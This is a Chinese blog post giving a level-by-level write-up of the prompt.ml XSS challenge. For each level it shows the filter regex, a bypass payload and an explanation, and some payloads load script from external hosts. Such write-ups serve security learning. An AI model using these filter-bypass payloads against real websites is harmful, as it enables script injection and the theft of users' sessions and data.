<!doctype html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>






<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="xss," />








  <link rel="shortcut icon" type="image/x-icon" href="/uploads/favicon.ico?v=5.1.1" />






<meta name="description" content="知是行之始，行是知之成   Prompt(1) to win XSS挑战赛的灵感来源于alert(1) to win。名字相似，内容却有不一样的精彩。">
<meta name="keywords" content="xss">
<meta property="og:type" content="article">
<meta property="og:title" content="深入xss-prompt(1)挑战">
<meta property="og:url" content="/2017/05/20/深入xss-prompt-1-挑战/index.html">
<meta property="og:site_name" content="Glad2metU">
<meta property="og:description" content="知是行之始，行是知之成   Prompt(1) to win XSS挑战赛的灵感来源于alert(1) to win。名字相似，内容却有不一样的精彩。">
<meta property="og:image" content="http://i4.buimg.com/594915/40e367facefe11a5.jpg">
<meta property="og:updated_time" content="2017-05-23T02:27:14.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="深入xss-prompt(1)挑战">
<meta name="twitter:description" content="知是行之始，行是知之成   Prompt(1) to win XSS挑战赛的灵感来源于alert(1) to win。名字相似，内容却有不一样的精彩。">
<meta name="twitter:image" content="http://i4.buimg.com/594915/40e367facefe11a5.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="/2017/05/20/深入xss-prompt-1-挑战/"/>





  <title>深入xss-prompt(1)挑战 | Glad2metU</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ca5988953450620ca8c294ff5c390a4a";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Glad2metU</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="/2017/05/20/深入xss-prompt-1-挑战/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="oTex911">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/header.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Glad2metU">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">深入xss-prompt(1)挑战</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-05-20T16:59:49+08:00">
                2017-05-20
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index">
                    <span itemprop="name">web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2017/05/20/深入xss-prompt-1-挑战/" class="leancloud_visitors" data-flag-title="深入xss-prompt(1)挑战">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数 </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote class="blockquote-center"><p>知是行之始，行是知之成 </p>
</blockquote>
<p><em>Prompt(1) to win XSS挑战赛的灵感来源于alert(1) to win。名字相似，内容却有不一样的精彩。</em></p>
<a id="more"></a>
<p><a href="http://prompt.ml/1" target="_blank" rel="external">Prompt(1)</a></p>
<h3 id="挑战赛"><a href="#挑战赛" class="headerlink" title="挑战赛"></a>挑战赛</h3><h4 id="Level-1"><a href="#Level-1" class="headerlink" title="Level 1"></a>Level 1</h4><p><em>regex:</em> <code>/&lt;\/?[^&gt;]+&gt;/gi</code><br><em>过滤点:</em> <code>&lt;任意内容&gt;</code><br><em>Payload:</em><br><figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">&lt;svg/onload=prompt(1) </div><div class="line">&lt;svg/onload=prompt(1)//</div><div class="line">&lt;img src=1 onerror=prompt(1)  </div><div class="line">&lt;img src=1 onerror=prompt(1)//</div></pre></td></tr></table></figure></p>
<p><em>Talk</em>: <code>Payload中的1和3末尾需跟换行或者空白符</code> </p>
<p><em>Demo:</em> <a href="https://github.com/OTEx911/xss-writeup/blob/master/prompt-1/level-1.html" target="_blank" rel="external">level-1</a></p>
<h4 id="Level-2"><a href="#Level-2" class="headerlink" title="Level 2"></a>Level 2</h4><p><em>regex:</em> <code>/[=(]/g</code><br><em>过滤点:</em> <code>=(</code><br><em>Payload:</em><br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">svg</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="undefined">alert&amp;#40;2)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="tag">&lt;/<span class="name">svg</span>&gt;</span></div></pre></td></tr></table></figure></p>
<p><em>Talk:</em><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">svg是一个比较特殊的标签，按元素种类分属于外部元素</div></pre></td></tr></table></figure></p>
<p><em>Demo</em>: <a href="https://github.com/OTEx911/xss-writeup/blob/master/prompt-1/level-2.html" target="_blank" rel="external">level-2</a></p>
<h4 id="Level-3"><a href="#Level-3" class="headerlink" title="Level 3"></a>Level 3</h4><p><em>regex:</em> <code>/-&gt;/g</code><br><em>过滤点:</em> <code>-&gt;</code><br><em>Payload</em>:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">--!&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="undefined">prompt(1)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></div></pre></td></tr></table></figure></p>
<p><em>Talk:</em> </p>
<blockquote>
<p><code>Although the character sequence --!&gt; raises a Parse error, the HTML Specifications defines the tokenization that makes it an alternative to end a comment:</code></p>
</blockquote>
<p><em>Demo:</em> <a href="https://github.com/OTEx911/xss-writeup/blob/master/prompt-1/level-3.html" target="_blank" rel="external">level-3</a></p>
<h4 id="Level-4"><a href="#Level-4" class="headerlink" title="Level 4"></a>Level 4</h4><p><em>regex:</em> <code>/^(?:https?:)?\/\/prompt\.ml\//i</code><br><em>过滤点:</em> <code>要求同源,且过滤了&lt;&gt;&amp;双引号</code><br><em>Payload:</em><br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http://prompt.ml%2f@xxx.com/test.js</div></pre></td></tr></table></figure></p>
<p><em>Talk:</em></p>
<p><code>URI的组成：</code></p>
<blockquote>
<p>abc://username:password@example.com:123/path/data?key=value&amp;key2=value#fragid1</p>
</blockquote>
<h4 id="Level-5"><a href="#Level-5" class="headerlink" title="Level 5"></a>Level 5</h4><p><em>regex:</em> <code>/&gt;|on.+?=|focus/gi|</code><br><em>过滤点:</em> <code>on、&gt;和focus</code><br><em>Payload:</em><br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">"type="image" src=1 onerror</div><div class="line">="prompt(1)</div></pre></td></tr></table></figure></p>
<p><em>Talk:</em></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">1. input标签中第一个type起绝对作用</div><div class="line">2. 换行的html能被解析</div></pre></td></tr></table></figure>
<p><em>Demo:</em> <a href="https://github.com/OTEx911/xss-writeup/blob/master/prompt-1/level-5.html" target="_blank" rel="external">level-5</a></p>
<h4 id="Level-6"><a href="#Level-6" class="headerlink" title="Level 6"></a>Level 6</h4><p><em>regex:</em> <code>/script:|data:/i</code><br><em>过滤点:</em> <code>javascript或vbscript或data等伪协议</code><br><em>Payload:</em><br><figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">javascript:prompt(1)#&#123;"action": "xxjsl"&#125;</div></pre></td></tr></table></figure></p>
<p><em>Talk:</em></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">该题比较有意思的地方是form元素的action属性，如果form中有</div><div class="line">出现name为action的元素，则选中该元素，否则form.action</div><div class="line">获取的便是默认form元素的action属性值。</div></pre></td></tr></table></figure>
<p><em>Demo:</em> <a href="https://github.com/OTEx911/xss-writeup/blob/master/prompt-1/level-6.html" target="_blank" rel="external">level-6</a></p>
<h4 id="Level-7"><a href="#Level-7" class="headerlink" title="Level-7"></a>Level-7</h4><p><em>regex:</em> <code>无</code><br><em>过滤点:</em> <code>限制了输入长度12</code><br><em>Payload:</em><br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">"&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="comment">/*#*/</span>prompt(<span class="comment">/*#*/</span><span class="number">1</span>)<span class="comment">/*#*/</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></div><div class="line">"&gt;<span class="tag">&lt;<span class="name">svg</span>/<span class="attr">a</span>=<span class="string">#</span>"<span class="attr">onload</span>=<span class="string">'/*#*/prompt(1)'</span></span></div><div class="line">"&gt;<span class="tag">&lt;<span class="name">script</span> <span class="attr">x</span>=<span class="string">#</span>"<span class="attr">async</span>=<span class="string">#</span>"<span class="attr">src</span>=<span class="string">"//g.cn/xxx(短网址)</span></span></div></pre></td></tr></table></figure></p>
<p><em>Talk:</em><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">虽然限制长度，但是此题思路应该是两种，利用html注释和js注释进行绕过。</div><div class="line">HTML注释太长，暂未想出payload。第二个payload的利用比较有意思，利</div><div class="line">用了p标签的双引号，同时用单引号进行了避免冲突。</div></pre></td></tr></table></figure></p>
<h4 id="Level-8"><a href="#Level-8" class="headerlink" title="Level-8"></a>Level-8</h4><p><em>regex:</em> <code>/[\r\n&lt;/&quot;]/g</code><br><em>过滤点:</em> <code>换行,斜线,双引号,左尖括号</code><br><em>Payload:</em><br><a href="https://pastebin.com/GJ7U3hzh" target="_blank" rel="external">Vector</a></p>
<p><em>Talk:</em><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">这道题目很有意思，关键点是如何进行换行。</div><div class="line">这里需要知道常见的换行符以及utf-8和unicode的关系，</div><div class="line">最重要的是如何将换行符写成代码的形式，还有&lt;!--和--&gt;区别。</div></pre></td></tr></table></figure></p>
<p><em>UTF:</em><br><img src="http://i4.buimg.com/594915/40e367facefe11a5.jpg" alt="UTF-8"></p>
<p>根据图中对比可知不可见字符应该是<code>\xE2\x80\xA8</code>和<code>\x0A</code>，此时是utf编码，转为unicode分别是<code>\u2028</code>和<code>\u000A</code>，对应的字符分别是<code>LS(Line Separator)</code>和<code>LF(Line Feed)</code>。LF是人为加上去以作区分。   </p>
<p><a href="https://en.wikipedia.org/wiki/Newline" target="_blank" rel="external">换行符</a><br><a href="https://unicode-table.com/en/#general-punctuation" target="_blank" rel="external">unicode表</a></p>
<blockquote>
<p>LF: Line Feed, U+000A<br>VT: Vertical Tab, U+000B<br>FF: Form Feed, U+000C<br>CR: Carriage Return, U+000D<br>CR+LF: CR (U+000D) followed by LF (U+000A)<br>NEL: Next Line, U+0085<br>LS: Line Separator, U+2028<br>PS: Paragraph Separator, U+2029</p>
</blockquote>
<p><em>Demo:</em> <a href="https://github.com/OTEx911/xss-writeup/blob/master/prompt-1/level-8.html" target="_blank" rel="external">Level-8</a></p>
<h4 id="Level-9"><a href="#Level-9" class="headerlink" title="Level-9"></a>Level-9</h4><p><em>regex:</em> <code>/&lt;([a-zA-Z])/g</code><br><em>过滤点:</em> <code>1.将左括号替换成了&lt;_ 2.转化一部分的unicode</code><br><em>Payload:</em><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&lt;ſvg&gt;&lt;ſcript/href=//⒕₨&gt;</div><div class="line">&lt;ſcript/ſrc=//⒕₨&gt;&lt;/ſcript&gt;</div><div class="line">&lt;ſcript/async/src=//⒛₨&gt;</div></pre></td></tr></table></figure></p>
<p><em>Talk:</em><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">js对大小写敏感，所以代码的引入需要通过外部环境。</div><div class="line">toUpperCase能够将一些特殊的unicode转为我们所需要的字符。</div><div class="line">ſ是unicode字符中字符值\u017f，转为utf-8为\xC5\x8F。</div></pre></td></tr></table></figure></p>
<h4 id="Level-A"><a href="#Level-A" class="headerlink" title="Level-A"></a>Level-A</h4><p><em>regex:</em> <code>/prompt/g</code><br><em>过滤点:</em> <code>连续两次过滤，先过滤prompt，再过滤单引号</code><br><em>Payload:</em><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">p&apos;rompt(1)</div></pre></td></tr></table></figure></p>
<p><em>Talk:</em><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">encodeURIComponent函数是用来对URI组件进行编码的。</div><div class="line">ASCII标点符号：-_.!~*&apos;()并不会被编码</div><div class="line">其他符号：;/?:@&amp;=+$,#则会被url编码</div></pre></td></tr></table></figure></p>
<p><em>Demo:</em> <a href="https://github.com/OTEx911/xss-writeup/blob/master/prompt-1/level-A.html" target="_blank" rel="external">Level-A</a></p>
<h4 id="Level-B"><a href="#Level-B" class="headerlink" title="Level-B"></a>Level-B</h4><p><em>regex:</em> <code>/[[|\s+*/\\&lt;&gt;&amp;^:;=~!%-]/g</code><br><em>过滤点:</em> <code>[|\s+*/\\&lt;&gt;&amp;^:;=~!%-</code><br><em>Payload:</em><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">&quot;(prompt(1))instanceof&quot;</div><div class="line">&quot;(prompt(1))in&quot;</div></pre></td></tr></table></figure></p>
<p><em>Talk:</em><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">草木皆兵，一切都可x。利用类型判</div><div class="line">断操作符进行js代码的执行。</div></pre></td></tr></table></figure></p>
<p><em>Demo:</em> <a href="https://github.com/OTEx911/xss-writeup/blob/master/prompt-1/level-B.html" target="_blank" rel="external">Level-B</a></p>
<h4 id="Level-C"><a href="#Level-C" class="headerlink" title="Level-C"></a>Level-C</h4><p><em>regex:</em> 与level-A过滤顺序相反<br><em>Payload:</em><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">1. eval((1172936279).toString(34).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))</div><div class="line">2. for((i)in(self))eval(i)(1)</div></pre></td></tr></table></figure></p>
<p><em>Talk:</em><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">Payload1: </div><div class="line">parseInt可将字符串转变成2～36进制的数。</div><div class="line">toString可将数字转字符，功能恰好相反。</div><div class="line">fromCharCode接受unicode值，返回字符串。</div><div class="line">concat则类似于python中的+，用于连接。</div><div class="line"></div><div class="line">Payload2:</div><div class="line">利用了prompt本身是window的方法特点，</div><div class="line">以及self此时等于window的条件。</div></pre></td></tr></table></figure></p>
<h3 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h3><ol>
<li><a href="http://csser.work/08/05/2016/xss-3/" target="_blank" rel="external">xss习题集_2.1</a></li>
<li><a href="http://heartsky.info/2016/07/11/prompt-1-writeup/" target="_blank" rel="external">prompt(1) writeup</a></li>
<li><a href="http://pwdme.cc/2016/12/06/prompt-ml-xss/" target="_blank" rel="external">prompt.ml的XSS挑战</a></li>
<li><a href="https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#level-9" target="_blank" rel="external">github-cure53</a></li>
<li><a href="https://unicode-table.com/en/#latin-extended-a" target="_blank" rel="external">UTF-8字符表</a></li>
</ol>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/xss/" rel="tag"># xss</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/05/18/Net-snmp-python拓展安装/" rel="next" title="记笔记-SIP和SNMP-python拓展安装">
                <i class="fa fa-chevron-left"></i> 记笔记-SIP和SNMP-python拓展安装
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/05/24/url-encode/" rel="prev" title="聊聊编码">
                聊聊编码 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODY0MC81MjEx"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/uploads/header.png"
               alt="oTex911" />
          <p class="site-author-name" itemprop="name">oTex911</p>
           
              <p class="site-description motion-element" itemprop="description">滴水穿石，不舍昼夜</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://suroot.cn" title="c0rpse" target="_blank">c0rpse</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.fangheart.top/" title="FangHeart" target="_blank">FangHeart</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.th1s.cn" title="th1s" target="_blank">th1s</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.cnblogs.com/lcamry" title="Icamry" target="_blank">Icamry</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://github.com/cure53" title="Cure53" target="_blank">Cure53</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#挑战赛"><span class="nav-number">1.</span> <span class="nav-text">挑战赛</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-1"><span class="nav-number">1.1.</span> <span class="nav-text">Level 1</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-2"><span class="nav-number">1.2.</span> <span class="nav-text">Level 2</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-3"><span class="nav-number">1.3.</span> <span class="nav-text">Level 3</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-4"><span class="nav-number">1.4.</span> <span class="nav-text">Level 4</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-5"><span class="nav-number">1.5.</span> <span class="nav-text">Level 5</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-6"><span class="nav-number">1.6.</span> <span class="nav-text">Level 6</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-7"><span class="nav-number">1.7.</span> <span class="nav-text">Level-7</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-8"><span class="nav-number">1.8.</span> <span class="nav-text">Level-8</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-9"><span class="nav-number">1.9.</span> <span class="nav-text">Level-9</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-A"><span class="nav-number">1.10.</span> <span class="nav-text">Level-A</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-B"><span class="nav-number">1.11.</span> <span class="nav-text">Level-B</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Level-C"><span class="nav-number">1.12.</span> <span class="nav-text">Level-C</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Reference"><span class="nav-number">2.</span> <span class="nav-text">Reference</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">oTex911</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  



  
  









  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>

  
  <script type="text/javascript" src="/lib/three/three.min.js"></script>

  
  <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("4uBSvV1VfS66JnxARLfv7BLu-gzGzoHsz", "0bxJ6KeAL6WiGATTp6QW4FpN");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
